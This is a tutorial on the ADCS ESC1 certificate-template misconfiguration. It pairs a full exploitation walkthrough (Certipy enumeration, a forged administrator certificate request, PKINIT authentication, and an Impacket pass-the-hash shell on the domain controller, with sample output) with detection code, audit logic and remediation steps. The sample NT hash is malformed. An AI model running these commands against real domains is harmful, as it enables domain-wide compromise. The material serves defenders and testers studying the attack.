From Machine Account To Domain Admin: Exploiting ADCS And ESC1 For
Executive Summary

Active Directory Certificate Services (ADCS) ESC1 is a critical misconfiguration that allows attackers with low-privileged domain credentials to escalate to Domain Administrator. This vulnerability exists when certificate templates are improperly configured, allowing users to request certificates on behalf of any domain account, including administrators. In this guide, we'll cover what ESC1 is, how attackers exploit it, the tools used, and how to defend your environment.

What is ADCS-ESC1?
Understanding Active Directory Certificate Services

Active Directory Certificate Services (ADCS) is Microsoft's Public Key Infrastructure (PKI) solution that manages digital certificates in Windows environments.

ADCS enables:
- User and computer authentication
- Smart card logon
- Code signing
- Secure email (S/MIME)
- Network access control (802.1x)

The ESC1 Vulnerability

ESC1 occurs when a certificate template has all of the following misconfigurations:
- Enrollee Supplies Subject is enabled: users can specify the Subject Alternative Name (SAN)
- Client Authentication EKU is present: the certificate can be used for authentication
- No Manager Approval required: certificates are issued automatically
- Domain Users can enroll: low-privileged users have enrollment rights
- Template is enabled: the template is published and active

When these conditions exist together, an attacker can:
- Request a certificate for ANY user (including Domain Admin)
- Use that certificate to authenticate as that user
- Maintain access for the certificate's validity period (typically 1-10 years)

Why This Matters

Severity: Critical - full domain compromise from a low-privileged account

Impact:
- Immediate Domain Administrator access
- Long-term persistence (certificates valid for years)
- Survives password resets
- Difficult to detect in standard logs
- Can be renewed before expiration

How Attackers Exploit ESC1

Attack Prerequisites
- Valid domain credentials (any domain user)
- Network access to the Domain Controller
- Network access to the Certificate Authority

Attack Flow

Low-Priv User -> Enumerate ADCS -> Find ESC1 Template -> Request Admin Certificate -> Authenticate -> Domain Admin

Tools Used in ESC1 Attacks

Offensive Tools

Certipy-AD
- Python-based ADCS exploitation tool
- Enumerates certificate templates
- Identifies vulnerabilities (ESC1-ESC13)
- Requests and authenticates with certificates
- Repository: https://github.com/ly4k/Certipy

RPCClient
- Part of the Samba suite
- Queries Active Directory via RPC
- Used to enumerate user SIDs

Impacket
- Python library for network protocols
- Tools for Pass-the-Hash attacks
- Remote command execution (wmiexec, psexec, smbexec)
- Repository: https://github.com/fortra/impacket

NetExec
- Network reconnaissance tool
- Domain enumeration
- Credential validation

Step-by-Step Exploitation

Prerequisites for ESC1 Exploitation

Before this attack can succeed, the following conditions must be met:

Account Requirements:
- Domain user account: any authenticated domain user (even low-privileged)
- No special permissions required: standard domain user privileges are sufficient
- Enrollment rights: the user must have enrollment permissions on the vulnerable certificate template (typically granted to the "Domain Users" group by default)

Certificate Template Requirements:
- Client Authentication EKU enabled: the template allows certificates to be used for authentication
- "Supply in the request" enabled: also known as "Enrollee Supplies Subject," this allows the user to specify the Subject Alternative Name (SAN)
- No manager approval required: certificate issuance is automatic, without administrative approval
- Domain Users can enroll: template permissions allow standard domain users to request certificates
- Template is published: the certificate template must be enabled and available on the Certificate Authority

Infrastructure Requirements:
- Active Directory Certificate Services (ADCS) deployed: the organization must be using ADCS for PKI
- Certificate-based authentication enabled: the domain must accept certificates for Kerberos authentication
- Network access to the Certificate Authority: the attacker must be able to reach the CA server (typically port 135 for RPC)

Tools Required:
- Certipy-AD: for certificate enumeration and exploitation
- Impacket suite: for credential extraction and lateral movement
- Network connectivity: to the domain controller and certificate authority

Why This Works

ESC1 exists because the "Enrollee Supplies Subject" setting combined with Client Authentication creates a dangerous combination: any domain user can request a certificate claiming to be any other user (including Domain Admins), and that certificate will be trusted for authentication without verification.
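As an added example (not code from the original article or from Certipy), the check below evaluates the five ESC1 conditions above against a template's Active Directory attributes (msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, msPKI-RA-Signature, pKIExtendedKeyUsage and the enrollment ACL). The Template class and its field names are this example's own, and the records are constructed, one of them mirroring the VulnerableUserTemplate shown later in this guide.

```python
from dataclasses import dataclass

# msPKI-Certificate-Name-Flag bit CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT ("Supply in the request")
ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag bit CT_FLAG_PEND_ALL_REQUESTS ("CA certificate manager approval")
PEND_ALL_REQUESTS = 0x00000002

# EKU OIDs that make an issued certificate usable for domain authentication
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}
# Enrollment principals that amount to "any domain user can enroll"
LOW_PRIV_PRINCIPALS = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}

@dataclass
class Template:               # field names are this example's own, not LDAP attribute names
    name: str
    enabled: bool             # published on at least one CA
    name_flag: int            # msPKI-Certificate-Name-Flag
    enrollment_flag: int      # msPKI-Enrollment-Flag
    ra_signatures: int        # msPKI-RA-Signature (authorized signatures required)
    ekus: list                # pKIExtendedKeyUsage OIDs
    enrollers: list           # principals holding Enroll rights, domain prefix stripped

def allows_client_auth(ekus):
    # An empty EKU list means "all purposes", which also satisfies the condition.
    return not ekus or any(oid in CLIENT_AUTH_EKUS for oid in ekus)

def esc1_conditions(t):
    """Return the ESC1 conditions that hold for this template; ESC1 needs all five."""
    checks = {
        "enabled": t.enabled,
        "enrollee_supplies_subject": bool(t.name_flag & ENROLLEE_SUPPLIES_SUBJECT),
        "client_authentication": allows_client_auth(t.ekus),
        "no_manager_approval": not (t.enrollment_flag & PEND_ALL_REQUESTS) and t.ra_signatures == 0,
        "low_priv_can_enroll": any(p in LOW_PRIV_PRINCIPALS for p in t.enrollers),
    }
    return [name for name, holds in checks.items() if holds]

def is_esc1(t):
    return len(esc1_conditions(t)) == 5

# Constructed records: the template from the Certipy output in this guide, the same template
# after remediation, and a server template that supplies its subject but lacks a client-auth EKU.
SAMPLE_TEMPLATES = [
    Template("VulnerableUserTemplate", True, ENROLLEE_SUPPLIES_SUBJECT, 0, 0,
             ["1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.20.2.2"], ["Domain Users", "Authenticated Users"]),
    Template("VulnerableUserTemplate (fixed)", True, ENROLLEE_SUPPLIES_SUBJECT, PEND_ALL_REQUESTS, 0,
             ["1.3.6.1.5.5.7.3.2"], ["PKI-Approved-Enrollers"]),
    Template("ConstructedWebServer", True, ENROLLEE_SUPPLIES_SUBJECT, 0, 0,
             ["1.3.6.1.5.5.7.3.1"], ["Domain Users"]),
]

if __name__ == "__main__":
    for t in SAMPLE_TEMPLATES:
        print(f"{t.name}: {'ESC1' if is_esc1(t) else 'ok'} {esc1_conditions(t)}")
```

In a real audit the records come from the template objects under CN=Certificate Templates,CN=Public Key Services in the Configuration partition; the same logic is what "Requires Manager Approval: False" plus "Enrollee Supplies Subject: True" plus a client-authentication EKU plus Domain Users enrollment rights mean in the Certipy output.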
Environment Details

Throughout this demonstration, the following environment details are used:

Domain: EXAMPLE.COM
Domain Controller: 192.168.1.10
Certificate Authority: EXAMPLE-DC-CA
CA Server: DC01.EXAMPLE.COM
Compromised User: testuser
Password: SecurePass123
Target Account: administrator@EXAMPLE.COM

Step 1: Enumerate ADCS and Find Vulnerable Templates

Command:

certipy-ad find -u "testuser@EXAMPLE.COM" -p "SecurePass123" -dc-ip 192.168.1.10 -vulnerable -enabled

Sample Output:

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 45 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
Certificate Authorities
  0
    CA Name                             : EXAMPLE-DC-CA
    DNS Name                            : DC01.EXAMPLE.COM
    Certificate Subject                 : CN=EXAMPLE-DC-CA, DC=EXAMPLE, DC=COM
    Certificate Serial Number           : 1A2B3C4D5E6F7890
    Certificate Validity Start          : 2023-01-15 08:30:00+00:00
    Certificate Validity End            : 2028-01-15 08:40:00+00:00
Certificate Templates
  0
    Template Name                       : VulnerableUserTemplate
    Display Name                        : Vulnerable User Template
    Certificate Authorities             : EXAMPLE-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Client Authentication
                                          Smart Card Logon
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 5 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : EXAMPLE.COM\Domain Users
                                          EXAMPLE.COM\Authenticated Users
      Object Control Permissions
        Owner                           : EXAMPLE.COM\Enterprise Admins
        Write Owner Principals          : EXAMPLE.COM\Domain Admins
                                          EXAMPLE.COM\Enterprise Admins
        Write Dacl Principals           : EXAMPLE.COM\Domain Admins
                                          EXAMPLE.COM\Enterprise Admins
        Write Property Principals       : EXAMPLE.COM\Domain Admins
                                          EXAMPLE.COM\Enterprise Admins
    [!] Vulnerabilities
      ESC1                              : 'EXAMPLE.COM\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication

What to Look For:
- The [!] Vulnerabilities section shows ESC1
- Enrollee Supplies Subject: True
- Client Authentication: True
- Requires Manager Approval: False
- Domain Users have enrollment rights

Step 2: Obtain Administrator SID

Microsoft patch KB5014754 requires the target user's SID in certificate requests.
We need to retrieve this.

Command:

rpcclient -U "EXAMPLE\\testuser%SecurePass123" 192.168.1.10

Sample Output:

rpcclient $>

Query the Administrator SID:

lookupnames administrator

Sample Output:

administrator S-1-5-21-3623811015-3361044348-30300820-500 (User: 1)

Note the SID: S-1-5-21-3623811015-3361044348-30300820-500

Type exit to close rpcclient.

Step 3: Request Certificate for Administrator

Now we request a certificate claiming to be the administrator.

Command:

certipy-ad req -u 'testuser@EXAMPLE.COM' -p 'SecurePass123' -dc-ip 192.168.1.10 -ca 'EXAMPLE-DC-CA' -target 'DC01.EXAMPLE.COM' -template 'VulnerableUserTemplate' -upn 'administrator@EXAMPLE.COM' -sid 'S-1-5-21-3623811015-3361044348-30300820-500'

Sample Output:

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 2847
[*] Got certificate with UPN 'administrator@EXAMPLE.COM'
[*] Certificate object SID is 'S-1-5-21-3623811015-3361044348-30300820-500'
[*] Saved certificate and private key to 'administrator.pfx'

Success Indicators:
- Successfully requested certificate
- Certificate saved to administrator.pfx
- Request ID provided (note it for cleanup)

Step 4: Authenticate with Certificate

Use the certificate to obtain administrator credentials.

Command:

certipy-ad auth -pfx administrator.pfx -dc-ip 192.168.1.10

Sample Output:

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@EXAMPLE.COM
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@EXAMPLE.COM': aad3b435b51404eeaad3b435b51404ee:a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6

Credentials Obtained:
- NT Hash: a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6
- Kerberos TGT: administrator.ccache

Step 5: Access Domain Controller

Use Pass-the-Hash to execute commands as Domain Administrator.

Command:

impacket-wmiexec EXAMPLE.COM/administrator@192.168.1.10 -hashes 'aad3b435b51404eeaad3b435b51404ee:a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6'

Sample Output:

Impacket v0.11.0 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
example\administrator

C:\>hostname
DC01

C:\>net user

User accounts for \\DC01

Administrator
Guest
krbtgt
testuser
svcadmin
sqlservice
The command completed successfully.

C:\>

Domain Admin access achieved!
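From the defender's side, the five steps above leave two artifacts that can be correlated: the CA's issued-certificate record for request 2847 (requested by testuser, but carrying the SAN administrator@EXAMPLE.COM) and the PKINIT TGT request that Step 4 causes on the domain controller (Event ID 4768 with PreAuthType 16 and the certificate's serial number). The following is an added example, not code from the original article, Certipy or Impacket; the records are constructed, the certificate serial numbers and the source IP 192.168.1.55 are made up, and the field names are assumptions about how the CA database export and the 4768 events are represented.

```python
import re

# Issued-certificate records as exported from the CA database (certsrv.msc "Issued
# Certificates" or certutil -view). Constructed; the request id, template, requester
# and SAN mirror Step 3 above, the serial numbers are made up.
ISSUED_CERTS = [
    {"request_id": 2847, "requester": "EXAMPLE\\testuser", "template": "VulnerableUserTemplate",
     "san": "Other Name:Principal Name=administrator@EXAMPLE.COM", "serial": "6100000b1f"},
    {"request_id": 2848, "requester": "EXAMPLE\\testuser", "template": "User",
     "san": "Other Name:Principal Name=testuser@EXAMPLE.COM", "serial": "6100000b20"},
    {"request_id": 2849, "requester": "EXAMPLE\\DC01$", "template": "DomainController",
     "san": "DNS Name=DC01.EXAMPLE.COM", "serial": "6100000b21"},
]

# Domain controller 4768 events, relevant fields only (constructed). The first one is
# the PKINIT TGT request that Step 4 above produces.
TGT_EVENTS = [
    {"EventCode": 4768, "TargetUserName": "administrator", "PreAuthType": "16",
     "CertSerialNumber": "6100000B1F", "IpAddress": "192.168.1.55"},
    {"EventCode": 4768, "TargetUserName": "testuser", "PreAuthType": "2",
     "CertSerialNumber": "", "IpAddress": "192.168.1.55"},
    {"EventCode": 4768, "TargetUserName": "DC01$", "PreAuthType": "16",
     "CertSerialNumber": "6100000B21", "IpAddress": "192.168.1.10"},
]

UPN_RE = re.compile(r"Principal Name=([^,\s]+)", re.IGNORECASE)

def requester_account(requester):
    """'EXAMPLE\\testuser' -> 'testuser' (lower-cased for comparison)."""
    return requester.split("\\")[-1].lower()

def san_account(san):
    """Account part of a UPN SAN, or None when the SAN carries no UPN (e.g. DNS only)."""
    m = UPN_RE.search(san)
    return m.group(1).split("@")[0].lower() if m else None

def mismatched_issuances(certs):
    """Issued certificates whose UPN SAN names a different account than the requester."""
    return [c for c in certs
            if san_account(c["san"]) not in (None, requester_account(c["requester"]))]

def pkinit_logons_with_mismatched_cert(certs, events):
    """4768 PKINIT logons (PreAuthType 16) presenting a certificate from a mismatched issuance."""
    by_serial = {c["serial"].lower(): c for c in mismatched_issuances(certs)}
    hits = []
    for e in events:
        if e["EventCode"] != 4768 or e["PreAuthType"] != "16":
            continue
        cert = by_serial.get(e["CertSerialNumber"].lower())
        if cert:
            hits.append({"target": e["TargetUserName"], "from": e["IpAddress"],
                         "request_id": cert["request_id"], "template": cert["template"],
                         "requested_by": cert["requester"]})
    return hits

if __name__ == "__main__":
    for h in pkinit_logons_with_mismatched_cert(ISSUED_CERTS, TGT_EVENTS):
        print(f"ALERT: PKINIT logon as {h['target']} from {h['from']} with certificate "
              f"request {h['request_id']} ({h['template']}) requested by {h['requested_by']}")
```

The requester/SAN comparison alone already flags request 2847 at issuance time; the 4768 join adds the moment the certificate is actually used and the host it was used from, and a machine certificate with only a DNS SAN is deliberately left out of the mismatch set.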
Detection Strategies

Event Log Monitoring

Key Event IDs to Monitor:

Event ID 4886 - Certificate Request
- Location: Certificate Authority -> Security Log
- Shows: who requested a certificate
- Limitation: doesn't show the SAN value used

Event ID 4887 - Certificate Issued
- Location: Certificate Authority -> Security Log
- Shows: which template was used and who received it

Event ID 4768 - Kerberos TGT Request
- Location: Domain Controller -> Security Log
- Shows: authentication type
- ESC1 Indicator: PreAuthType = 16 (PKINIT/certificate authentication)

Certificate Authority Console
- Open certsrv.msc on the CA server
- Navigate to "Issued Certificates"
- Add the columns "Requester Name" and "Subject Alternative Name"
- Red Flag: Requester Name ≠ SAN (e.g., testuser requests a certificate for administrator)

SIEM Detection Query Example

Splunk Query (the two event codes are parenthesized so that the index filter applies to both):

index=windows (EventCode=4887 OR EventCode=4768)
| where (EventCode=4887 AND RequesterName!="administrator") OR (EventCode=4768 AND PreAuthType=16)
| stats count by RequesterName, TargetUserName, ComputerName

Mitigation and Remediation

Fix Vulnerable Templates

Access Certificate Templates: Run -> certtmpl.msc

For each vulnerable template:
- Right-click template -> Properties
- Subject Name tab: change from "Supply in the request" to "Build from this Active Directory information"
- Issuance Requirements tab: enable "CA certificate manager approval"
- Security tab:
  - Remove "Domain Users" from enrollment rights
  - Remove "Authenticated Users" from enrollment rights
  - Add only specific security groups that require access

Revoke Malicious Certificates
- Open certsrv.msc on the Certificate Authority
- Navigate to "Issued Certificates"
- Find the certificate by Request ID
- Right-click -> "All Tasks" -> "Revoke Certificate"
- Select Reason: "Privilege Withdrawal"

Best Practices

Template Configuration:
- Never allow "Supply in the request" unless absolutely necessary
- Always require manager approval for sensitive templates
- Restrict enrollment to specific groups, not Domain Users
- Remove the Client Authentication EKU if not required
- Reduce certificate validity periods (use shorter timeframes)

Monitoring:
- Enable audit logging on the Certificate Authority (Event IDs 4886, 4887)
- Monitor for certificate requests with mismatched requester/SAN
- Alert on PKINIT authentication (Event ID 4768, PreAuthType=16)
- Regularly audit certificate templates for misconfigurations

Regular Audits:

Run vulnerability scans using Certipy or similar tools:

certipy-ad find -u 'auditor@domain.com' -p 'password' -dc-ip <DC-IP> -vulnerable -enabled

Real-World Impact

Threat Actor Usage

APT29 (2022): Used ESC1 to impersonate administrators and maintain persistent access in compromised networks.
UNC5330 (2024): Exploited Ivanti vulnerabilities, followed by ESC1 abuse for domain escalation.

Business Impact
- Average Breach Cost: $4.35M (2024)
- Recovery Time: 6-12 months for a full domain rebuild
- Certificate Validity: 1-10 years of potential unauthorized access
- Persistence: survives password resets and standard remediation

MITRE ATT&CK Framework Mapping for ESC1

Primary Technique

T1649 - Steal or Forge Authentication Certificates
- Tactic: Credential Access
- URL: https://attack.mitre.org/techniques/T1649/
- Description: Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Certificate-related misconfigurations enable opportunities for privilege escalation by allowing users to impersonate privileged accounts via identities (SANs) associated with a certificate.

Tactics Covered
- TA0006 - Credential Access: ESC1 enables obtaining administrator authentication certificates
- TA0004 - Privilege Escalation: escalating from a low-privileged user to Domain Administrator via certificate impersonation
- TA0003 - Persistence: long-term access via certificate validity (typically 1-10 years), surviving password resets

Related Sub-Techniques

T1078.002 - Valid Accounts: Domain Accounts
- Tactics: Defense Evasion, Persistence, Privilege Escalation, Initial Access
- URL: https://attack.mitre.org/techniques/T1078/002/
- Once the certificate is obtained, it functions as valid domain account credentials for authentication

Detection Data Sources (per MITRE)
- Active Directory: Active Directory Credential Request
- Active Directory: Active Directory Object Modification
- Application Log: Application Log Content
- Logon Session: Logon Session Creation
- Windows Registry: Windows Registry Key Access

Key MITRE References
- SpecterOps Certified Pre-Owned Whitepaper: referenced in T1649 as foundational research
- Contributors: Lee Christensen (SpecterOps), Thirumalai Natarajan (Mandiant)
- Technique Created: August 3, 2022
- Last Modified: October 14, 2024

Conclusion

ADCS-ESC1 represents a critical vulnerability that transforms low-privileged access into long-term domain compromise. The combination of easy exploitation, difficult detection, and extended persistence makes this a high-priority security concern for any organization running Active Directory Certificate Services.
Key Takeaways:
- ESC1 is exploitable with basic domain credentials and publicly available tools
- Detection is challenging without proper logging and monitoring
- Impact is severe: full domain compromise with multi-year persistence
- Remediation is straightforward: fix template configurations and implement proper access controls
- Prevention is critical: regular audits and security best practices

Organizations must prioritize ADCS security by:
- Auditing certificate templates regularly
- Implementing least-privilege access controls
- Enabling comprehensive monitoring
- Training administrators on ADCS security
- Testing defenses through purple team exercises

The tools and knowledge to exploit ADCS are freely available. The question is not whether attackers will target your certificate infrastructure, but when. Proactive security measures are essential to protect against this "privilege escalation as a service" vulnerability.

References
- SpecterOps - Certified Pre-Owned: https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf
- Black Hills Information Security - ADCS Abuse Guide: https://www.blackhillsinfosec.com/abusing-active-directory-certificate-services-part-one/
- Microsoft ADCS Documentation: https://learn.microsoft.com/en-us/windows-server/identity/ad-cs/
- Certipy GitHub Repository: https://github.com/ly4k/Certipy
- Impacket GitHub Repository: https://github.com/fortra/impacket